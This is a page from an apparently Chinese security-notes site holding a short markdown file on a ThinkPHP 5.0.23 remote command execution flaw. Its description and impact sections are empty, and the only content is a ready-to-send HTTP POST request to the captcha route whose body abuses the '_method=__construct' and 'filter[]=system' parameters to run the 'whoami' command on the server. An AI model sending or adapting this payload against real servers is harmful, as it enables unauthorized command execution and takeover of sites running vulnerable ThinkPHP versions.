menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 002-Thinkphp 5.x 命令执行漏洞 chevron_right 010-Thinkphp 5.0.23.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    010-Thinkphp 5.0.23.md
    466 B / 2021-07-17 00:01:32
        # Thinkphp 5.0.23
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    ### 三、复现过程
    
    
    ```bash
    POST /index.php?s=captcha HTTP/1.1
    Host: yuorip
    Accept-Encoding: gzip, deflate
    Accept: */* Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 72
    
    
    _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
    ```
    
    links
    file_download